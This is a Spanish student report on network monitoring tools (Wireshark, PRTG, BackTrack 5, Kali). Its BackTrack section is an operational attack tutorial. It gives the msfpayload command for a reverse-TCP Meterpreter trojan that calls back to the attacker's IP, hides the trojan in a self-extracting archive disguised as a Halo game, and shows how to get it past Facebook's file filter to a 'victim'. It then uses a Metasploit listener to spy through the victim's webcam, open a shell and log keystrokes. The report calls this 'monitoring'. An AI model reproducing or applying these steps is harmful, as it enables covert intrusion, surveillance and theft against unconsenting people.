Upload
marco-franco-aparicio
View
91
Download
0
Embed Size (px)
DESCRIPTION
Monitoreo de Dispositivos en una red con Back Track 5R3 y Kali Linux
Citation preview
0
Software para el Monitoreo
de Redes
Asignatura:
Administración de redes de
computadoras
Equipo:
Mata Mendoza Jannet
Hernández Orgaz José Javier
Franco Aparicio Marco Barmori
Saviñon Alvarez Ary Noe
Juárez Olvera Mereció Gildardo
Docente:
Ing. José Martin Cruz Domínguez
Contenido Que es el Monitoreo de redes. ..................................................................................................... 2
Herramientas para el Monitoreo de Redes ................................................................................... 3
WIRESHARK ............................................................................................................................... 3
Instalación ............................................................................................................................. 3
Practica Captura de paquetes con Wireshark. .................................................................... 10
Conclusión de la práctica .................................................................................................... 14
PRTG ........................................................................................................................................ 15
Instalación ........................................................................................................................... 15
Practica ................................................................................................................................ 22
Anexos ................................................................................................................................. 30
BACK TRACK............................................................................................................................. 31
Requerimientos mínimos. ................................................................................................... 32
Costo.................................................................................................................................... 32
Booteo de Back Track 5 r3 ................................................................................................... 32
Instalación de Back Track 5 r3 ............................................................................................. 36
Practica: Monitoreo con Back Track. ................................................................................... 41
Ocultar virus en un archivo auto extraíble. ......................................................................... 46
Mandar un virus a través de internet (Facebook). .............................................................. 54
Resultados. .......................................................................................................................... 67
Conclusión. .......................................................................................................................... 68
Referencias .......................................................................................................................... 69
Kali Linux. .................................................................................................................................... 70
Instalación de Kali Linux en Vmware Workstation 11.0 ...................................................... 70
Práctica en Kali Linux ........................................................................................................... 86
Conclusiones........................................................................................................................ 95
Referencias .......................................................................................................................... 95
2
Que es el Monitoreo de redes.
El análisis y monitoreo de redes hoy en día Las redes de cómputo de las organizaciones, se
vuelven cada vez más complejas y la exigencia de la operación es cada vez más demandante. Las
redes, cada vez más, soportan aplicaciones y servicios estratégicos de las organizaciones.
Por lo cual el análisis y monitoreo de redes se ha convertido en una labor cada vez más
importante y de carácter pro-activo para evitar problemas. Anteriormente, cuando no existían
las herramientas que hoy existen, era necesario contratar a una empresa especializada para esta
labor, con un costo muy elevado. Las herramientas que nos sirven para este análisis que le
permiten, a Ud. mismo, realizar esta importante labor, y contar un sistema experto como aliado,
que le ayuda en la interpretación de los resultados obtenidos.
Un sistema o herramienta de monitoreo de red busca problemas causados por la sobrecarga y/o
fallas en los servidores, como también problemas de la infraestructura de red (u otros
dispositivos).
Por ejemplo, para determinar el estatus de un servidor web, software de monitoreo puede
enviar, periódicamente, peticiones HTTP(Protocolo de Transferencia de Hipertexto) para
obtener páginas; para un servidor de correo electrónico, enviar mensajes mediante SMTP
(Protocolo de Transferencia de Correo Simple), para luego ser retirados mediante IMAP
(Protocolo de Acceso a Mensajes de Internet) o POP3 (Protocolo Post Office).
La administración del rendimiento se puede dividir en 2 etapas:
monitoreo y análisis.
Administración de fallas.
Herramientas para el Monitoreo de Redes WIRESHARK
Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar
análisis y solucionar problemas en redes de comunicaciones, para desarrollo de software y
protocolos, y como una herramienta didáctica. Cuenta con todas las características estándar de
un analizador de protocolos de forma únicamente hueca.
La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas
opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a
través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras)
estableciendo la configuración en modo promiscuo. También incluye una versión basada en
texto llamada tshark. Permite examinar datos de una red viva o de un archivo de captura salvado
en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por
cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la
habilidad de mostrar el flujo reconstruido de una sesión de TCP.
Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y
compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, Android, y Mac OS X, así
como en Microsoft Windows.
Instalación
Para poder descargar Wireshark es necesario acudir a este URL:
https://www.wireshark.org/
Ilustración 1 Wireshark
Te saldrá la siguiente pantalla le darás clic en donde dice Download.
4
Ilustración 2 Selección de descarga de wireshark
Después seleccionaras el archivo que sea deseas ya sea para x64 o la de x32.
Le das clic a la opción que desees y empezara la descarga.
Una vez descargado el programa nos vamos a la carpeta donde se guardó dicho
archivo.
Ilustración 3 Icono de Wireshark
Una vez encontrado el archivo que se descargó se debe dar doble clic al archivo para
poderlo instalar.
Ilustración 4 proceso de instalación de wireshark
Aparecerá esta ventana y le darás clic en Next.
Ilustración 5 Proceso de instalación de wireshark 1.2
Aparecerá la ventana donde se muestran las condiciones de la licencia, le darás clic
en I Agree.
6
Ilustración 6 Proceso de instalación de wireshark 1.3
En esta pantalla puede elegir que instalar por lo general lo dejas como esta
predeterminado, para esto le darás clic en Next.
Ilustración 7 Proceso de instalación de wireshark 1.4
En esta ventana te sugiere si deseas agregar el icono del programa a menú de inicio o
a la barra de tareas o en otro caso hacer un icono de acceso directo en el escritorio, al
igual de que si deseas asociar el programa con una lista de extensiones, si deseas
hacerlo seleccionas las opciones deseadas y en cuanto que no deseas hacer nada de
lo anterior no seleccionas nada y le das clic en Next.
Ilustración 8 Proceso de instalación de wireshark 1.5
En esta ventana se indica de manera predeterminada donde se instalara el programa,
se le dará clic en Next.
Ilustración 9 Proceso de instalación de wireshark 1.6
Después aparecerá esta ventana y te pedirá que instales WinPcap, si no estás seguro
de que es este programa dándole clic en What is WinPcap y se abrirá una página web
y te explicara por qué debes instalarlo, para después darle clic en Install.
8
Ilustración 10 Proceso de instalación de wireshark 1.7
Aparecerá esta ventana donde se aprecia que la instalación ha comenzado.
Ilustración 11 Proceso de instalación de wireshark 1.8
Una vez completada la instalación se verá como esta ventana solo queda darle clic en
Next.
Ilustración 12 Proceso de instalación de wireshark 1.9
En esta ventana podrás seleccionar si deseas ejecutar el programa o mostrar noticias
nuevas acerca del software.
Para poder finalizar solo seleccionamos la opción deseada y le damos clic en Finish.
Ilustración 13 Proceso de instalación de wireshark 1.10
Te aparecerá una ventana como está puedes darle cli en ok y cada que abras el software
te seguirá saliendo ese cuadro de dialogo o solo seleccionas el cuadrito y luego le das
clic en ok y ya no te volverá a salir.
10
Ilustración 14 Proceso de instalación de wireshark 1.11
Si seguiste al pie de la letra los pasos anteriores podrás observar esta pantalla la cual
muestra la pantalla principal del programa y habrás finalizado la instalación de
Wireshark.
Practica Captura de paquetes con Wireshark.
Para poder capturar algunos paquetes que circulan en nuestra red es necesario hacer
lo siguiente.
Abrir el programa Wireshark.
Ilustración 15 Ventana principal de Wireshark
Aparecerá la siguiente pantalla.
Ilustración 16 Entorno de trabajo de Wireshark
Le daremos clic en el icono de captura de paquetes, el cual es el primero de la barra.
Ilustración 17 Icono de selección de tarjeta de red.
Ilustración 18 Selección de tarjeta de red.
Una vez que le dimos clic saldrá esta ventana y deberemos de seleccionar la interface
que vamos a utilizar para escuchar el tráfico de red podemos seleccionar la de wifi o la
de Ethernet. Y le damos clic en Start.
12
Ilustración 19 Captura de paquetes en la red
El programa empezara a escuchar la red y mostrara en pantalla todo el tráfico de
paquetes en la red.
Ilustración 20 Filtro de paquetes en Wireshark.
Podemos seleccionar el tipo de filtrado que deseamos hay un extenso menú en la parte
donde dice filter.
Ilustración 21 Comandos del tipo de filtrado.
En este caso seleccionaremos el comando ip.addr == y utilizaremos algún nodo que
forme parte de la red para ver los paquetes que está enviando y recibiendo. En este
caso utilizamos la dirección 192.168.1.71.
El comando seria ip.addr==192.168.1.71.
Ilustración 22 Paquetes capturados.
Entonces la pantalla siguiente lo que nos muestra son los paquetes que envía y recibe
el nodo que tenga como dirección 192.168.1.71.
Podemos observar 3 zonas de datos.
La primera zona del listado de paquetes capturados.
Ilustración 23 Zona de paquetes de datos en Wireshark.
Área de captura lo referente al paquete pero está cifrado.
Ilustración 24 Zona de información sobre paquetes capturados.
14
Ethernet.
Ilustración 25 Cabecera ethernet del contenido.
Nos muestra la cabecera Ethernet y nos muestra todo el contenido.
La cabecera son los primeros 6 dígitos son destino y los otros 6 son del origen y los dos
bite son el protocolo en el que viaja el paquete y nos muestra lo referente al paquete
pero no se puede leer ya que esta encriptado.
Conclusión de la práctica
Con este programa podemos monitorear nuestra red, ver que paquetes viajan por la red
y podemos capturar paquetes, cookies, contraseñas de otras redes que estén al alcance
de nuestro adaptador y lo podemos ocupar también para checar que las personas que
estén utilizando la red la usen de manera adecuada y no estén viendo cosas que no
estén permitido hacer en la red como por ejemplo estar viendo pornografía en una red
dedicada al trabajo escolar.
PRTG
Monitoriza su red y no requiere de otros programas. Puede ser usado para monitorizar
ordenadores y equipos de red usados en su infraestructura. Simplemente descargue e instale su
versión de PRTG. Cuando la red se cae, por ejemplo los empleados no pueden leer sus e-mails.
Los clientes no pueden comprar los productos. El trabajo se para. La monitorización de redes
nos ayuda a mantener un negocio saludable.
Usos:
Evita caídas caras.
Encuentra los cuellos de botella antes que se vuelvan problemas.
Reduce los costes al comprar solo el hardware que usted necesita.
Instalación
Para poder instalar PRTG Network Monitor es necesario descargar la versión adecuada a su
sistema operativo.
Primero debemos descargarlo abriendo en el navegador la siguiente dirección:
https://www.es.paessler.com/prtg
Ilustración 26 página principal de PRTG
16
Aparecerá la siguiente pantalla seleccionaremos el botón de color verde que dice DESCARGAR
FREEWARE.
Ilustración 27 descargar de PRTG
Después te re direccionara a esta página y le darás clic en el botón de color naranja que dice
descargar.
NOTA: Deberás guardar en un archivo de texto o en una nota lo que dice en detalles de la licencia
después se van a utilizar esos datos.
PRTG Network
Monitor 15.3.19.4027 Setup Freeware and Trial (Stable).exe
Ilustración 28 Icono de PRTG
Una vez descargado el archivo, te diriges a la ubicación del archivo y le darás doble clic.
Ilustración 29 Proceso de instalación de PRTG
Te aparecerá la siguiente ventana le darás clic en ejecutar.
Ilustración 30 Proceso de instalación de PRTG 1.2
Seleccionaras el idioma y le darás clic en aceptar.
Ilustración 31 Proceso de instalación de PRTG 1.3
Te saldrá esta ventana le darás clic en siguiente.
Ilustración 32 Proceso de instalación de PRTG 1.4
18
En esta ventana seleccionaras que deseas aceptar el acuerdo y le darás clic en siguiente.
Ilustración 33 Proceso de instalación de PRTG 1.5
Te pedirá que introduzcas una dirección de correo electrónico y después le darás clic en
siguiente.
Ilustración 34 Proceso de instalación de PRTG 1.6
Llenaras estos datos con lo que guardaste al inicio de la instalación, te pedirá que introduzcas el
nombre de la licencia y la clave, para después darle clic en siguiente.
Ilustración 35 Proceso de instalación de PRTG 1.7
Le darás clic en siguiente.
Ilustración 36 Proceso de instalación de PRTG 1.8
Comenzará la instalación del software.
20
Ilustración 37 Proceso de instalación de PRTG 1.9
Después inicializara los servicios de PRTG.
Ilustración 38 Proceso de instalación de PRTG 1.10
Aparecerá esto en tu pantalla donde te dirá que el servidor se está iniciando para poder
funcionar.
Se crearan estos accesos directos en tu escritorio con los cuales podrás abrir la consola del PRTG
y la página principal del mismo software.
Ilustración 40 Pantalla de Consola de PRTG
Al darle clic al icono que dice PRTG Enterprise Console es la pantalla principal de lo que abre.
Ilustración 39 Iconos de PRTG
22
Ilustración 41 Pantalla principal de PRTG Network Monitor.
Y si le das clic al icono que dice PRTG Network Monitor esta es la pantalla principal de lo que se
ejecuta.
Después de seguir al pie de la letra todo los pasos anteriores ya tienes el software instalado.
Practica
PRTG cuanta con una variedad de sensores con los cuales podemos monitorear
zonas específicas de una red, así mismo nos permite monitorear toda una red o
bien una IP e especifico. Al iniciar a usar PRTG nos da una seria e sensores por
default los cuales ayudan a el monitoreo de la red que estemos conectador o
supervisando.
Ilustración 42 Sensores de dispositivos PRTG
Para comenzar con la práctica y ver el tipo de monitoreo que tendremos en la
red debemos de crear un grupo, seguido de un dispositivo y finalizando con los
sensores que sean necesarios para monitorear la red.
Podemos crear el grupo personalizado o PRTG nos la opción de crearlo
automáticamente. Dando clic derecho o ubicando nos en la parte de abajo
“Añadir grupo”.
Ilustración 43 Crear grupo nuevo
Ilustración 44 Asignación de nombre del grupo
24
Una vez creado el grupo creamos un dispositivo.
Ilustración 45 Nuevo dispositivo
Seleccionamos el grupo y en la siguiente ventana agregamos el nombre que
tendrá el dispositivo, damos clic en Continuar.
Ilustración 46 Configuración del dispositivo.
Procedemos agregando los sensores con los cuales se estará trabajando.
Seleccionamos el grupo al cual deseamos agregar un sensor, damos clic en
Continuar.
Ilustración 47 Selección de grupo de trabajo para agregar un sensor.
En la siguiente ventana seleccionamos el tipo de sensor. En el cual podremos
encontrar que hay sensores para monitorear una página asta para el estado de
una CPU.
Ilustración 48 menú de sensores
En nuestro caso seleccionamos Common Saas Checkl el cual nos sirve para
ver es estado de algunas redes que contienen los navegadores. Asignamos un
nombre y damos clic en continuar.
26
Ilustración 49 Configuración del servidor.
Podemos aprecias que ya está agregado y que podemos empezar a hacer uso
de él.
Ilustración 50 Common Saas Checkl agregado
Podemos apreciar que aún no hay datos generados en el sensor, pero el
monitoreo ya está en ejecución.
El estado cambia constante mente dependiendo el uso que se les de alas redes
que se atan monitoreando, en ella podemos apreciar gráficas, estado con fecha,
porcentajes y poder modificar algo si lo es requerido.
Ilustración 51 Grafica de estado de la red.
28
Ilustración 52 estado de las redes después de un cierto tiempo de monitoreo
Grafica de estado en porcentaje.
Ilustración 53 Estado de la red.
Información detallada de la grafica.
Ilustración 54 Información detallada de la grafica
Ajustes de Common Saas Checkl en caso de ser necesario
Ilustración 55 Zona de ajustes Common Saas Checkl
30
Anexos
PRTG cuanta con una manual de ayuda el del cual se obtienen muchas dudas y
a su vez un gran beneficio, también cuanta con tres plataformas que están
disponible en la web, consola para CPU y disponible en dispositivos móviles.
Para así brindarnos un mejor monitoreo de la red y asegurarnos de que no haya
ningún error, cuenta también con un generador de reportes ya sea mensual o
anual mente.
Ilustración 56 Alarma PRTG de errores
BACK TRACK
Imagen 1 Back Track 5r3
Back Track es una distribución GNU/Linux en formato Live CD pensada y
diseñada para la auditoría de seguridad y relacionada con la seguridad
informática en general. Actualmente tiene una gran popularidad y aceptación en
la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el
Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual
pasó a basarse en la distribución Linux SLAX en lugar de Knoppix.
La última versión de esta distribución cambió el sistema base, antes basado en
Slax y ahora en Ubuntu.10
Incluye una larga lista de herramientas de seguridad aptas para el uso, entre las
que destacan numerosos escáneres de puertos y vulnerabilidades, archivos de
exploits, sniffers, herramientas de análisis forense y herramientas para la
auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100
Network Security Tools" de 2006.2
32
Requerimientos mínimos.
Equipo de cómputo:
Espacio libre en disco duro mínimo 15 GB
Tener al menos un 1 GB en memoria
Procesador 1.66 GHz
Contar con una tarjeta de red inalámbrica en el equipo.
Unidad de CD/DVD en el equipo.
Costo.
Totalmente Gratis.
Booteo de Back Track 5 r3
Para instalar la imagen ISO en equipo de cómputo portátil.
Primero se debe tomar en cuenta como se introducirá el sistema operativo, ya
sea por medio de una USB o por medio de un disco a través de la unidad de CD.
En el caso se tuvo que bootear la imagen en una USB. Para poder hacerlo se
usó el programa “Lili USB Creator”. Permite usar una memoria USB como un
disco de instalación.
Imagen 2 Lili USB Creator Logo
Para bootear el sistema operativo, basta con abrir el programa.
Imagen 3 Menú de Lili USB Creator
Se debe elegir el dispositivo USB donde se introducirá el sistema operativo.
Imagen 4 Seleccionar memoria para bootear sistema
34
Luego en el paso 2, seleccionar la ubicación del archivo ISO de Back Track.
Imagen 5 Buscar imagen ISO para bootear
En el caso buscaremos una imagen ISO.
Imagen 6 Selección de imagen ISO Back Track 5 r3
Se presiona el botón “Abrir” y se abra dado la ruta del archivo.
Imagen 7 Tamaño de resistencia de la imagen
En el tercer paso, tamaño de resistencia no influye en la operación.
Para el cuarto paso se debe elegir unas opciones del booteo, ocultar los archivos
para que no sean borrados por accidente de preferencia. Y formatear dispositivo
a “FAT32” borrando los datos contenidos en la USB.
Imagen 8 Paso número 4 del booteo
Para el paso cinco basta con presionar el botón en forma de rayo color amarillo,
para iniciar la operación de booteo.
Imagen 9 Comenzar a bootear
36
Cuando en esta misma parte aparezca el mensaje, “El dispositivo está listo para
funcionar”, la memoria esta lista para ser usada e instalar Back Track 5 r3 en el
equipo portátil.
Instalación de Back Track 5 r3
Para conseguir que el equipo de cómputo lea primero la memoria USB, debe
configurarse la opción “Boot” en la BIOS, donde se podrá seleccionar que lea en
primer lugar el puerto USB al que está conectada la memoria, en vez del disco
duro.
Primero aparecerá una pantalla de color negro a la que debemos presionar
“Enter”.
Luego aparece la pantalla de back Track 5, se debe seleccionar la primera opción
presionando “Enter” para continuar.
Imagen 10 Instalación de Back Track Mode Text
Aparecerá una pantalla que indica cargar los archivos del sistema, después
aparece un fondo de pantalla.
Enseguida aparece una nueva ventana en la cual se indicara que debe ingresar
en el modo grafico de instalación con el comando “startx”.
Imagen 11 Iniciar Modo Grafico
Ahora aparece un escritorio en pantalla, es la interfaz que permitirá instalar el
back Track, dando doble click en el icono del escritorio en forma de dragon
“Install Back Track”.
Imagen 12 Panel de Back Track Live CD
38
Lo primero que aparecerá será el primer paso de la instalación, donde se debe
seleccionar el idioma y presionar el botón “Adelante”.
Imagen 13 Selección idioma de instalación
El segundo paso es elegir la ubicación del equipo y la zona horaria, una vez
seleccionados basta con presionar el botón “Adelante”.
En el tercer paso se debe especificar la configuración del teclado, seleccionando
en este caso la opción “sugerida”. Se debe presionar el botón “Adelante” para
continuar.
Imagen 14 Configuración del teclado de instalcion
Ahora en el cuarto paso, se debe especificar la partición del disco que será usada
para almacenar el sistema operativo, es mejor la segunda opción “Especificar
particiones manualmente”, pues en caso de tener otra partición no causarle
daños borrando sus archivos. Presionar “Adelante”.
Imagen 15 Selección de disco o partición para instalación
40
El paso siete, es dar click en el boton “Instalar”, una vez que se ha configurado
la instalcion. Presionar “Instalar”.
Imagen 16 Mensaje de configuración pre-instalación
La instalación comienza y se muestra en pantalla el porcentaje de instalación.
Imagen 17 Barra de progreso de instalación
Para cuando termina la instalación, es necesario es necesario reiniciar el equipo, en la pantalla aparece el mensaje en
una ventana. Presionar “Reiniciar”. Para cuando arranque, se debe retirar el dispositivo USB, para que lea normalmente
el disco duro de la computadora.
Practica: Monitoreo con Back Track.
Para comenzar a usar el Back Track en la computadora es necesario iniciar el
sistema operativo prendiendo el computador. Primero pedirá introducir el usuario
y la contraseña. El usuario que se debe introducir es “root” y la contraseña es
“toor”.
Luego debe iniciarse el sistema operativo en modo gráfico con el comando
“startx”.
Imagen 18 Iniciar usuario y contraseña, modo grafico
Luego se podrá entrar al sistema operativo para comenzar el trabajo.
Imagen 19 Escritorio de Back Track 5 r3
42
Ahora para comenzar probar la práctica, es necesario conectarse a la red, que
servirá para tener comunicación entre el equipo que monitoreara y alguno de los
equipos con Windows que podrá ser monitoreado.
Imagen 20 Error de bus conexión
Al abrir el explorador de redes wifi, mostrara un mensaje de error en un bus de
la computadora. No es un error grave. Basta con presionar el botón “OK”.
Imagen 21 Selección de red inalambrica
Ahora se mostraran las redes disponibles, en este caso la red donde se
encuentran conectados varios equipos en la de nombre “Halo” presionar el botón
“Connect”.
Ahora se muestra que el equipo está conectado a la red. Obtuvo la dirección IP
192.168.43.8
Imagen 22 Conexión de red inalámbrica de prueba
Ahora es necesario abrir una ventana de comandos o “Terminal”, en esta parte
se pueden escribir los comandos necesarios para usar algunas herramientas de
BackTrack 5 r3, por lo que en este caso se usara la herramienta “Metaexploit”.
Imagen 23 Ventana terminal
44
Una forma de averiguar la dirección IP que tienen el equipo, es usando el
comando “ifconfig”.
Imagen 24 Comando ifconfig
De esa forma se mostrara la IP ya sea de la antena Wi-fi o cableada.
Imagen 25 Dirección de red inalámbrica
Ahora es necesario abrir una nueva ventana de comandos. Para usar escribir el
comando necesario que creara un troyano, un virus que permitirá el acceso
remoto a un equipo donde sea ejecutado.
Imagen 26 Creación de virus Troyano
El comando como puede apreciarse es “msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.43.8 LPORT=9999 x >
/root/Desktop/Mi_troyano.exe”.
El msfpayload es una herramienta que ayuda a crear el troyano.
La instrucción windows significa que será usado para trabajar en sistema
operativo Windows.
La instrucción meterpreter es la que permite usar los comandos o funciones.
La instrucción reverse_tcp significa que usara en una comunicación inversa. La
computadora con Windows que ejecutara el troyano debe estar conectada a la
misma red. Toda la información será mandada a la computadora atacante.
La instrucción LHOST=(IP ATACNTE) se le ordena al troyano a que dirección
IP será mandada la información.
La instrucción LPORT=9999 , es la que indica a través de que puerto de la
computadora se podrá enviar el virus. Muchos puerto de la computadora quedan
abiertos a procesos para poder trabajar, por eso la ocurrencia de monitorear a
través de uno de ellos.
En las últimas líneas solo se designa la ruta donde aparecerá el archivo creado.
La ruta /root/Desktop/Mi_troyano.exe significa que el archivo aparecerá en el
escritorio, se le asigna un nombre en este caso “Mi_troyano.exe”.
El “.exe” significa que se tratara de un programa ejecutable.
Ahora existen varias formas de hacer llegar este virus creado a un equipo de
cómputo, puede ser a través de internet mandándolo comúnmente por internet,
a través de redes sociales como Facebook o a través de un correo electrónico.
El único infortunio es que no permiten cargar archivos ejecutables para mandar,
por obvias razones de seguridad en caso de tratarse de virus.
46
Ocultar virus en un archivo auto extraíble.
Para introducir el virus y el ejecutable del juego en un mismo archivo auto
extraíble, es necesario elegir ambos archivos, presionar clic derecho sobre ellos
para desplegar una lista de opciones.
Imagen 27 Virus y ejecutable de video juego
Seleccionar la opción “Add to archive”. Aparecerá una ventana para realizar una
configuración.
Imagen 28 Agregar archivos a winrrar
En la ventana, se debe seleccionar el método de compresión que debe ser
“Best”, el formato del archivo está bien “Rar”. Del extremo derecho se debe
palomear la opción “Create SFX archive”. Se debe asignarle un nombre al
archivo, también designar el tipo de archivo que se creara “.exe”, en este caso
fue (halo5.exe).
Imagen 29 Configuración de pestaña General en winrrar
En la pestaña “Advanced”, presionar el botón “SFX options…”, mostrara otra
ventana de configuración.
Imagen 30 Configuración de pestaña Advanced en winrrar
48
En esa nueva ventana debemos dar la ruta del archivo actual, por ejemplo la ruta
del archivo ejecutable del juego, para ello seleccionar el archivo, presionar clic
derecho y presionar la opción “propiedades”.
Imagen 31 Propiedades del archivo seleccionado
Copear la ruta para poder pegarla en la ventana de configuración.
Imagen 32 Copiar ruta de archivo seleccionado
Pegar la ruta en la ventana de configuración en la pestaña “General”, cambiar
las diagonales inversas “\”, por diagonales normales en la ruta “/”.
Imagen 33Introducir ruta en pestaña General
Ir a la pestaña “Setup”, en la parte “Run after extraction” escribir el nombre del
virus con todo y el tipo de archivo, ejemplo: practica1.exe.
En la parte inferior “Run before extraction” escribir el nombre del archivo y el
tipo de archivo que se ejecutara con el virus, ejemplo: haloce.exe.
Imagen 34 Asignación de archivos en pestaña Setup
50
Ir a la pestaña “Modes”, en la parte “Silent mode” seleccionar la opción “Hide
all”.
Imagen 35 Pestaña Mode Hide all en winrrar
Ir a la pestaña “Update”, en la parte “Ocerwrite mode” elegir la opción “Skip
existing files”.
Imagen 36 Pestaña Update de winrrar Skip existing files
Para agregar un icono de presentación al archivo se debe ir a la pestaña “Text
and icon”, en la parte “Customize SFX logo and icon”, presionar en la parte
inferior “Load SFX icon the file” botón “Browse”. Se abrirá el explorador de
archivos para elegir un icono, en este caso se descargó el mismo que usa el
juego de video.
Imagen 37 Insertar un icono para el archivo auto estraible
El icono debe ser un archivo tipo “.ico”, o no se mostrara la imagen.
Imagen 38 selección de icono para archivo autoextraíble
52
Presionar el botón “Abrir”, enseguida el botón “Aceptar”.
Imagen 39 Ruta de icono para archivo
Presionar nuevamente “Aceptar” en la última ventana.
Imagen 40 Aceptar los cambios configurados
De esta forma comenzara a generar el archivo auto extraíble.
Imagen 41 Creación de archivo autoextraíble
De esta forma se genera el archivo auto extraíble y ejecutable, para poner en
marcha el juego mientras trabaja el virus. En este caso el archivo se llama
“halo5.exe”.
Imagen 42 Nuevo archivo autoextraíble nombre halo5
54
Mandar un virus a través de internet (Facebook).
Teniendo nuestro archivo auto extraíble al que se le asigno la tarea de ejecutar
en este caso el juego (Halo pc) mientras ejecuta el virus (Troyano) que permitirá
la conexión remota.
Se puede enviar a través de una red social quizás la más común (Facebook).
Esta red social no permite mandar por mensaje archivos (.exe, .bat, .cdm, etc).
Sin embargo en esta práctica se muestra na forma muy fácil de hacerlo. Mandar
un archivo tipo “exe”.
Primero que nada, se muestra la ubicación del archivo autoextraíble creado.
En este caso su nombre es “halo5.jpg”, ejecuta el juego y el virus.
Imagen 43 Archivo listo para enviar por internet
Importante acceder a la cuenta personal de Facebook, ubicar la opción de
mensajes en la parte superior, “Mostrar todos”. Mostrará cada mensaje personal.
Imagen 44 Enviar desde cuenta de facebook
Seleccionar a la persona que se le enviara el virus, conociendo que tiene la
misma aplicación o en este caso video juego (Halo pc).
Se presiona la opción “Agregar archivo” en la parte inferior de la conversación.
Imagen 45 Adjuntar archivos para enviar en facebbok
Seleccionar el archivo “exe” que se desea enviar. Presionar clic derecho sobre
el archivo, que servirá para desplegar una lista de opciones.
56
Ya que Facebook no permite enviar archivos “exe”, es importante comprimir el
archivo de una forma distinta desde Facebook.
Imagen 46 Selección de archivo a enviar
De la lista de opciones, seleccionar “Add to archive”.
Imagen 47 Agregar archivo a Zip opciones
Se abre una ventana, donde se deben configurar unas opciones.
Imagen 48 Creación de archivo Zip para envió
En método de compresión debe seleccionarse “Best”, en tipo de archivo debe
seleccionarse Zip. Por ultimo presionar “Aceptar”.
Ahora se mostrara en la ventana de explorador de archivos, el ejecutable recién
empaquetado.
Imagen 49 Nuevo archivo Zip listo para enviar por facebook
58
Se elige el archivo en Zip para enviar por Facebook, este comenzara a cargarse.
Y estará listo para enviarse por mensaje, sin ningún problema podrá ser
descargado por la víctima y podrá ser desempaquetado. Nota: Puede que el
archivo al ser desempaquetado sea eliminado por el antivirus.
Imagen 50 Adjuntar archivo Zip por facebook
Este mismo método fue intentado también por medio de “Gmail”. Mandar el virus
autoextraíble a través de Gmail, no fue posible, pues el virus sigue siendo
detectado.
Imagen 51 Error al enviar archivo por gmail
También puede transferirse el virus a través de un medio físico, como una
memoria “USB”, ejecutándolo en una computadora dentro de la misma red.
Por lo que existan formas de cubrir un virus ocultándolo, a través de otro tipo de
archivos. Pues cualquier antivirus en automático al detectarlo lo eliminaría.
Suponiendo que el archivo fue enviado a una computadora es necesario activar
la herramienta “Metaexploit”.
En una ventalla de comandos, se escribe el comando “msfconsole”.
Imagen 52 Comando msfconsole para abrir Metaexploit
Esto puede tardar un poco.
Cuando cargue la herramienta aparecerá esto en pantalla.
Imagen 53 Metaexploit abierto
60
Activamos la herramienta para poner en modo escucha y espera, de modo que
esperara la respuesta de algún equipo que activara el virus troyano. De esta
forma se podrá monitorear la computadora.
Imagen 54 Comando use multi/handler
El primer comando para activar es “use multi/handler”.
Imagen 55 comando para activar virus de forma remota
El segundo comando es: “set PAYLOAD Windows/meterpreter/reverse_tcp”.
Sirve para indicar con qué tipo de archivo se realizara la conexión.
Imagen 56 Selección de IP atacante y puerto para el envió de datos
Luego se indica que debe conectarse a la computadora atacante. Con el
comando “set LHOST (IP DEL ATACANTE)”. Después se indica a través de un
puerto en este caso con el comando “set LPORT 9999”.
Ahora se debe revisar la configuración hecha con otro comando “show options”.
Imagen 57 Comando show para ver configuración del puerto
Es hora de activar “Metaexploit” para que espera una respuesta del virus.
Con el comando “exploit -j”.
Imagen 58 Comando exploit –j herramienta en espera de activar virus
62
Ahora es tiempo de esperar, debe conectarse una computadora activando el
virus.
Imagen 59 Activación de virus e inicio de sesión con comando sessions -i
Como se puede apreciar en la primera línea, se logra la conexión con un equipo
que activo el virus.
Para apreciarlo mejor basta con introducir el comando sessions -i , que
mostrara en lista las computadoras con las que se puede iniciar sesión con un
“Id” para poder elegirlo.
Escogiendo la victima por su identificador se debe insertar el comando necesario
sessions -i (identificador) , como en el caso de la practica fue el número “1”.
Ahora estando conectados, se encuentra en funcionamiento la herramienta
“meterpreter”.
Imagen 60 Selección de sesión dependiendo del identificador
Algunos comandos que se pueden usar fueron, “ps”, sirve para ver los procesos
activos en el equipo de cómputo víctima.
Imagen 61 Procesos activos de victima
Otro comando útil es “run webcam”, para activar la webcam de la víctima.
Imagen 62 Activación de webcam
64
Para observar lo que graba la webcam, es necesario entrar a los archivos en
back Track 5, entrar a la carpeta de usuario “root”, aparecerá un archivo de
nombre “webcam.htm”, se debe abrir con el explorador de internet disponible.
Imagen 63 Ubicación de archivo para ver webcam
Estará mostrando capturas que hace la cámara al estar activada, las muestra
desde el explorador de internet, y se actualiza la imagen constantemente. Basta
con presionar la tecla “F5” para estar actualizando.
Imagen 64 webcam activada imágenes actualización constante
Para detener un comando o tarea desde la consola basta con presionar una
combinación de teclas. Por ejemplo detener la webcam el comando es “Ctrl+c”.
Imagen 65 Detener webcam Ctrl+c
Para poder entrar al disco duro de la víctima y manipular sus archivos, basta con
introducir en la consola el comando “shell”.
Imagen 66 Comando Shell para entrar al disco duro de la victima
La ubicación por defecto a la que manda es el escritorio de la víctima.
En esta ocasión solo se crearon unas carpetas en el escritorio con el comando
“mkdir (nombre de carpeta)”.
Imagen 67 Comando mkdir para crear carpetas
66
Imagen 68 Escritorio de la computadora victima carpetas creadas
Para ver el contenido de archivos donde está ubicada la herramienta se usa el
comando “dir”.
Imagen 69 Comando dir para ver contenido de ubicación
Para salir de su disco duro basta con escribir “exit”. Regresando a la herramienta
“meterpreter”.
Otro comando con una función importante es el “keyscan_start” sirve para
mostrar todo lo que la víctima tecle, desde combinación de teclas hasta texto.
Cada vez que se consulte se debe usar el comando “keyscan_dump”.
Para detener esta función se usa el comando “keyscan_stop”.
Imagen 70 uso de comando keyscan muestra lo que teclea la victima
En este caso la victima escribió “esta es una prueba de captura del teclado
jejejejeje”.
